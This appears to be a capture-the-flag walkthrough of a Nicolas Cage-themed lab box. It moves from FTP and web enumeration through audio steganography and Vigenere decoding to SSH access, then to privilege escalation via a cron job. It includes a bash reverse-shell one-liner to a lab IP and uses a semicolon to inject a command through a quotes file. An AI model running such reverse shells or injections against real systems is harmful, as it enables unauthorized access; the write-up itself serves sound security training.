This looks like an interesting box, let’s start by running an nmap scan for all open ports and follow this up with a version scan:
So we have an FTP server on port 21 allowing anonymous login, Open ssh on port 22 and an Apache httpd web server on port 80 with the title, “Nicholas Cage Stories”.
FTP Server Port 21
We can see one file here called dad_tasks, let’s download it.
Looking at the file it appears to be encoded. Converting from base64 gives the following:
This looked like a cypher; however, having tried ROT13 and various others, I had no luck.
Port 80 — Web Server
We have a nice website for Mr Cage. We also have a potential user in his son, who is called Weston. Other than that, there is not a lot of functionality on the site and the source code does not reveal any additional information.
Anyway time to launch Gobuster and look for hidden directories on the website. We find a number of directories that we will visit sequentially.
/images
Looks like all the images used on the website, nothing really interesting.
/html
Nothing really here
/scripts
Just a load of scripts, all very rubish.
/contracts
Nothing in here.
/auditions
This looks more promising, there is a a file called,”must_practice_corrupt_file.mp3". Let’s download it using wget to our local machine and have a look at it.
Listening to the file were hear Gage going through a scene and then there appears to be a corruption to the file and we get almost a random sound.
I am thinking some sort of stenography whether audio or file based I am not sure. Running it through Binwalk did not disclose any hidden files, so time to analyse the audio. The tool I prefer to use for this is Sonic Visualiser
Load the file into Sonic Visualiser, select ‘Pane’ and ‘Add Spectrogram’, all channels. Locate roughly where the noise starts and adjust the Colour. We can see some hidden text. Use the mouse wheel to zoom in if required.
Going back to the cypher we had earlier from the base64 decode.
We established that this was not ROT13 or any variation, but we can see it is some sort of cypher due to the structure of the text. Next we can try a vigenere cypher using the text found in the audio steganography above.
This gives us the password required for the challenge.
It works and the text is decoded and we may have the ssh passphrase for Weston, his son.
SSH Port 22
And we are in as user: weston
Looking around the /home directory there is nothing of interest. Checking out the ID we can see that user weston is also a member of group cage.
Checking out whether Weston has any Sudo privileges we can see the following:
We see he can run /usr/bin/bees, we can see that the owner is root and weston has read and write access to the file. Taking a look at the file, we see:
I think this is a bit of a rabbit hole as I cannot see a way to add a reverse shell to this file.
Also every so often a quote appears on the screen which indicates that a crone job is being run in the background. This needs further exploring.
To make life easier I am going to send a bash shell back to a Pwncat listener, simply because it has much more function than the standard ssh shell, allowing additional functions such as Upload, Download and Privesc enumeration.
To find out what is going on with the quote, I will upload and run Pspy64 to monitor processes; hopefully we will be able to catch the cron job issuing the quote.
After a few minutes we get our cron job executed:
We can see that it is calling “python /opt/.dads_scripts/spread_the_quotes.py” which is run from UID=1000 which is user cage. Let’s find all files for group cage.
find / -group cage 2>/dev/null
Let’s take a look at these files, they r located in a hidden directory under /opt/.dads_scripts
Looking at the “spread_the_quotes.py” the code pulls a random quote from the .quotes file and then uses the wall command to issue the quote to all terminals. The .files directory contains the .quotes file:
Privesc to user cage
As the spread_the_quotes.py is run by user cage, we should be able to change the .quotes file to include a reverse shell and send this back to another listener to elevate our privilege to user cage.
To do this I will simple delete the .quotes file and create a new one with a simple bash reverse shell.
echo ‘;bash -c “bash -i >& /dev/tcp/10.9.6.68/4444 0>&1”’ > .quotes
The “;” is important so that we can break out of the wall command.
We then setup a listener on our local machine and wait for the cron job to execute.
Let’s take a look around /home/cage:
There is a file called Super_Duper_Checklist that looks interesting:
And we have the user flag
There is also an interesting directory /email_backup containing a number of emails which we can view:
email_1
email_2
email_3
This is a very strange email and we have some sort of encoded text or cypher. Also there are many references to “face”. This makes me think it is a Vigenere cypher with the key being “face”
Privesc to Root
Our assumption is correct and this appears to be a password. Sean is probably the root user, so let’s see if we can su as root.
su root
Let’s take a look around /root for interesting files:
Again we have the email_backup directory, let’s take a look at this:
We have two email files stored.
email_1
email_2
We have the root flag and the box is completed.
I really enjoyed this box, it was great fun. A big thank you to the developer whose link is below.
